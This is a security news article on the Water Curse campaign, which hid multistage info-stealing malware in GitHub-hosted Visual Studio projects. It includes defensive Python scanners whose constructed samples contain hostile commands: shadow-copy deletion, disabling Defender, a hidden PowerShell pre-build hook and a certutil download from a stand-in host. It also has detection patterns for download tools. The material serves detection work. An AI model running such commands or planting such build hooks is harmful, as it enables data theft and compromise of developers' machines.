Saturday, December 13, 2025

Water Curse Hacker Group Unleashes Multistage Malware via 76 Weaponized GitHub Accounts

A highly active cybercriminal group known as “Water Curse” has been found distributing multistage malware through at least 76 weaponized GitHub repositories, posing a severe threat to cybersecurity professionals, game developers, and software engineering teams.

This campaign is notable for its blend of stealth, technical sophistication, and exploitation of legitimate open-source platforms, presenting a significant supply chain risk to organizations globally.

Security researchers from Trend Micro’s Managed Detection and Response (MDR) team analyzed the attack chain and discovered that malicious payloads were concealed within widely used tools, including an SMTP email bomber and the Sakura-RAT.

The group embedded their malware into Visual Studio project configuration files, leveraging the inherent trust developers place in open-source software.

Figure: Visual representation of the Water Curse infection chain, detailing each stage from initial access and payload delivery to persistence, data collection, and exfiltration.

Upon execution, the infected project files triggered a complex infection process: malicious batch scripts in the <PreBuildEvent> tag generated a VBS script, which in turn downloaded and executed obfuscated PowerShell scripts.

These scripts utilized custom key derivation to decrypt additional payloads.

They performed extensive system reconnaissance, including anti-debugging checks, privilege escalation via Windows Registry modifications (notably a UAC bypass), and the creation of persistent scheduled tasks to secure long-term control over infected hosts.

Multistage Infection and Data Exfiltration Mechanisms

The malware’s modular payloads are designed for adaptability and evasion. Once executed, Water Curse’s malware leverages legitimate tools, such as 7-Zip, to unpack encrypted archives, dropping Electron-based applications and additional scripts.

Notable behaviors include disabling Windows Defender (via scripts such as disabledefender.ps1), deleting Volume Shadow Copies to prevent system recovery, and establishing persistence through scheduled tasks running with system privileges.

The scheduled tasks, masquerading as legitimate diagnostic processes (e.g., “BitLocker Encrypt All Drives”), are configured to remain active almost indefinitely, launching Electron-based launchers with embedded malicious code.
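The persistence traits just described (a task named like a built-in diagnostic job, running as SYSTEM with the highest run level, repeating almost indefinitely, and launching a binary from a user profile) can all be read from an exported Task Scheduler XML definition. The following audit script is an added example, not Trend Micro's code; both task definitions in it are constructed for illustration, and the lookalike-name and user-writable-path patterns are my own assumptions rather than vendor signatures.

```python
"""Audit an exported Task Scheduler XML definition for the persistence traits
described in the article. Added example, not Trend Micro's code; both task
definitions below are constructed for illustration."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories a standard user can write to; a SYSTEM task launching from one is a red flag.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)
# Names that borrow the look of built-in diagnostic or security tasks (assumed list).
LOOKALIKE_NAME = re.compile(r"bitlocker|diagnostic|defender|update|telemetry", re.I)

# Constructed: a BitLocker-style task name, runs a launcher out of a user profile
# as SYSTEM, and repeats every minute for 9999 days.
SUSPECT_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\BitLocker Encrypt All Drives</URI></RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <Repetition><Interval>PT1M</Interval><Duration>P9999D</Duration></Repetition>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\alice\\AppData\\Local\\Diagnostics\\launcher.exe</Command>
      <Arguments>--hidden</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed: an ordinary nightly backup task, for contrast.
BENIGN_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Nightly Backup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-12-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\\svc_backup</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command></Exec></Actions>
</Task>
"""


def _text(root, path):
    """Text of the first element matching a namespaced path, or '' if absent."""
    el = root.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def duration_days(iso):
    """Approximate length in days of an ISO 8601 duration such as P9999D or PT1M."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?)?", iso or "")
    if not m:
        return 0.0
    days, hours, minutes = (int(x) if x else 0 for x in m.groups())
    return days + hours / 24 + minutes / 1440


def audit_task(xml_text):
    """Return the list of suspicious traits found in one task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    if _text(root, "t:Principals/t:Principal/t:UserId") == "S-1-5-18":
        findings.append("runs_as_system")
    if _text(root, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append("highest_run_level")
    if USER_WRITABLE.search(_text(root, "t:Actions/t:Exec/t:Command")):
        findings.append("binary_in_user_writable_path")
    for rep in root.findall(".//t:Repetition", NS):
        if duration_days(rep.findtext("t:Duration", default="", namespaces=NS)) >= 365:
            findings.append("near_indefinite_repetition")
    # A system-sounding name only matters in combination with another trait.
    if findings and LOOKALIKE_NAME.search(_text(root, "t:RegistrationInfo/t:URI")):
        findings.append("system_lookalike_name")
    return findings


if __name__ == "__main__":
    # On a live host: schtasks /Query /TN "<name>" /XML > task.xml, then audit that file.
    for label, xml in (("suspect", SUSPECT_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, audit_task(xml))
```

Each trait alone is common on a healthy system (many built-in tasks run as SYSTEM), so the value is in the combination: a SYSTEM task with a near-indefinite repetition that launches from a user profile is rare enough to be worth a ticket.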

Water Curse’s primary goal is information theft. The malware collects sensitive data from the profiles of browsers such as Chrome, Edge, and Firefox, including saved passwords, cookies, autofill data, browsing histories, and session tokens.

It also exfiltrates session artifacts from platforms such as GitHub and ChatGPT, and prepares RDP configuration files for remote access or lateral movement.

Orchestration and exfiltration are facilitated via outbound connections to Telegram and Gofile servers, leveraging legitimate cloud services to blend in with regular network traffic.

The data is compressed using 7-Zip into an archive named “stealFiles.7z” before being uploaded.
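The defensive-evasion steps listed above (Defender disabled via a script, Volume Shadow Copies deleted) and the staging-then-upload sequence (a 7-Zip archive followed by outbound traffic to Telegram or Gofile) each leave distinct marks in endpoint telemetry, and the second one is best caught by correlating two events rather than by either alone. The detection logic below is an added example, not Trend Micro's or Trend Vision One's code; the log lines are constructed in an invented one-line-per-event format, and the ten-minute correlation window and browser allow-list are assumptions to tune per environment.

```python
"""Run simple detections over process-creation and network events. Added
example, not Trend Micro's code; the telemetry format and lines are constructed."""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry: "<timestamp> PROC|NET key=value ...", one event per line.
SAMPLE_LOG = """\
2025-12-13T10:01:58Z PROC pid=3988 image=powershell.exe cmdline="powershell.exe -File C:\\Users\\alice\\AppData\\Local\\Temp\\disabledefender.ps1"
2025-12-13T10:01:59Z PROC pid=4001 image=powershell.exe cmdline="powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"
2025-12-13T10:02:03Z PROC pid=4010 image=vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2025-12-13T10:02:11Z PROC pid=4120 image=7z.exe cmdline="7z.exe a stealFiles.7z C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data"
2025-12-13T10:02:40Z NET pid=4133 image=launcher.exe dst=api.telegram.org:443 bytes_out=2834112
2025-12-13T10:03:05Z NET pid=4133 image=launcher.exe dst=store1.gofile.io:443 bytes_out=2834112
2025-12-13T10:15:00Z NET pid=5200 image=chrome.exe dst=api.telegram.org:443 bytes_out=1820
2025-12-13T11:00:00Z PROC pid=6000 image=7z.exe cmdline="7z.exe a release.7z build\\out"
"""

DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable|disabledefender\.ps1", re.I)
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)
ARCHIVE_CREATE = re.compile(r"\b7z(\.exe)?\s+a\b", re.I)
# Legitimate cloud services the article names as exfiltration channels.
EXFIL_HOSTS = re.compile(r"(^|\.)(telegram\.org|gofile\.io)$", re.I)
# Browsers talk to these services legitimately; anything else doing so is interesting.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
EXFIL_WINDOW = timedelta(minutes=10)  # assumed: archive-to-upload gap worth correlating


def parse_event(line):
    """Parse one constructed telemetry line into a dict with a datetime 'ts'."""
    ts, kind, rest = line.split(" ", 2)
    fields = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', rest):
        fields[key] = bare if bare else quoted
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "kind": kind, **fields}


def detect(log_text):
    """Return (rule, pid, detail) tuples for every detection that fires."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    hits = []
    # Single-event rules on process command lines.
    for e in events:
        cmd = e.get("cmdline", "")
        if e["kind"] != "PROC":
            continue
        if DEFENDER_TAMPER.search(cmd):
            hits.append(("DEFENDER_TAMPER", e["pid"], cmd))
        if SHADOW_DELETE.search(cmd):
            hits.append(("SHADOW_COPY_DELETE", e["pid"], cmd))
    # Correlation rule: an archive is created, then a non-browser process uploads
    # to one of the exfiltration services within the window.
    archives = [e for e in events if e["kind"] == "PROC" and ARCHIVE_CREATE.search(e.get("cmdline", ""))]
    for a in archives:
        for n in events:
            if n["kind"] != "NET" or n["image"].lower() in BROWSERS:
                continue
            host = n["dst"].rsplit(":", 1)[0]
            if EXFIL_HOSTS.search(host) and a["ts"] <= n["ts"] <= a["ts"] + EXFIL_WINDOW:
                detail = f"{a['cmdline']} -> {n['dst']} ({n.get('bytes_out', '?')} bytes out)"
                hits.append(("STAGED_EXFIL", n["pid"], detail))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_LOG):
        print(f"{rule:<20} pid={pid:<6} {detail}")
```

Note that the second archive in the sample (a release build at 11:00) produces no alert because nothing uploads to the watched services afterwards; the correlation is what keeps ordinary 7-Zip use out of the alert queue.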

Defense and Mitigation: Lessons for Organizations

The Water Curse campaign exemplifies the growing risks of supply chain compromise and highlights the importance of rigorous code validation, especially for open-source tools.

Organizations are urged to audit all open-source dependencies, scrutinize build scripts and repository histories, and consider utilizing internal code repositories where feasible.
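The initial-access trick described earlier (a batch command placed in a project's <PreBuildEvent> that writes a VBS script, which in turn fetches and runs hidden PowerShell) and the advice here to scrutinize build scripts come down to the same concrete check: read every command that MSBuild will execute automatically and flag the ones that look nothing like a build step. The scanner below is an added example, not Trend Micro's or any project's code; the sample project file is constructed, and the indicator patterns are my own assumptions, not a vendor signature set.

```python
"""Scan MSBuild project files (.vcxproj, .csproj) for build-event commands that
show the traits described in the article. Added example, not Trend Micro's or
any project's code; the sample project and the indicator patterns are assumptions."""
import re
import sys
import xml.etree.ElementTree as ET

# Elements whose command text runs automatically when the project is built.
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "CustomBuildStep"}

# Indicator patterns (assumed list, tune to taste).
SUSPICIOUS = {
    "script_interpreter": re.compile(r"\b(cscript|wscript|mshta|powershell|pwsh)(\.exe)?\b", re.I),
    "hidden_or_bypass_flags": re.compile(
        r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|enc(odedcommand)?\b)", re.I),
    "download_primitive": re.compile(
        r"\b(certutil|bitsadmin|curl|wget|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b", re.I),
    "writes_to_temp_or_appdata": re.compile(r"%(TEMP|TMP|APPDATA|LOCALAPPDATA)%", re.I),
}

# Constructed .vcxproj: a pre-build event that chains a VBS and a hidden PowerShell
# run, a normal post-build copy, and a custom target that fetches a script.
SAMPLE_VCXPROJ = """<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PreBuildEvent>
      <Command>cscript //nologo "%TEMP%\\setup.vbs" &amp;&amp; powershell -w hidden -ep bypass -File "%TEMP%\\setup.ps1"</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>xcopy /y "$(TargetPath)" "$(SolutionDir)dist\\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="AfterBuild">
    <Exec Command="certutil -urlcache -split -f http://example.invalid/x.ps1 %TEMP%\\x.ps1" />
  </Target>
</Project>
"""


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def build_commands(project_xml):
    """Yield (location, command) for every command MSBuild would run for this project."""
    root = ET.fromstring(project_xml)
    for el in root.iter():
        name = _local(el.tag)
        if name in EVENT_TAGS:
            # .vcxproj nests a <Command> child; old-style .csproj puts the text directly in the element.
            cmd_el = next((c for c in el if _local(c.tag) == "Command"), None)
            text = (cmd_el.text if cmd_el is not None else el.text) or ""
            if text.strip():
                yield name, text.strip()
        elif name == "Exec" and el.get("Command"):
            yield "Exec", el.get("Command").strip()


def scan_project(project_xml):
    """Return one finding per build command that matches at least one indicator."""
    findings = []
    for location, cmd in build_commands(project_xml):
        reasons = [key for key, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings.append({"location": location, "reasons": reasons, "command": cmd})
    return findings


if __name__ == "__main__":
    # Usage: python scan_msbuild.py path/to/*.vcxproj  (no arguments: scan the constructed sample)
    sources = [(p, open(p, encoding="utf-8-sig").read()) for p in sys.argv[1:]] or [("sample", SAMPLE_VCXPROJ)]
    for label, xml in sources:
        for f in scan_project(xml):
            print(f"{label}: {f['location']}: {', '.join(f['reasons'])}\n    {f['command']}")
```

Run against a freshly cloned repository before opening it in Visual Studio; the post-build xcopy in the sample stays silent, which is the point, since a scanner that flags every build event would be ignored within a week.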

Advanced threat detection platforms, such as Trend Vision One, have proven effective in identifying and blocking these attacks by correlating telemetry and leveraging AI-driven analytics.

As attacks from groups like Water Curse become more sophisticated and targeted, proactive security awareness and threat intelligence sharing within the cybersecurity and developer communities remain critical for maintaining robust digital defenses.

By understanding and mitigating the technical and social engineering tactics employed in this campaign, organizations can significantly reduce their exposure to similar supply chain threats in the future.

Indicators of Compromise

SHA1                                      Detection
6b78948f441eee53f21791d4dd88dd4fdcd5f7e3  Trojan.PS1.SAKULOAD.AA
4c189405d684eb8e70b1848b356967e783b9c543  Trojan.PS1.BOXTER.SAK
5cd53d94caf0e811b82bad958b34322eb082567f  Trojan.MSIL.SAKURAT.AA.comp
e1a02b787597a844b82a73c2488000088d0533b4  TrojanSpy.Win32.DOENERIUM.AA
ad25ee224973140d41c6ecf1c1500d4efeb0b324  Trojan.PS1.NULLMOVER.SAK
27c4161777ba005166156de311ba58de49eac874  Trojan.MSIL.SAKULOAD.AA
435e74551890b8c70c4b09446ec6ce0a932763f5  Trojan.Win32.KEPAVLL.VSNW07E25
4c391ebeff4cdfbc87ca83772a535d4386e5a5b2  Trojan.Win64.INFOSTEAL.E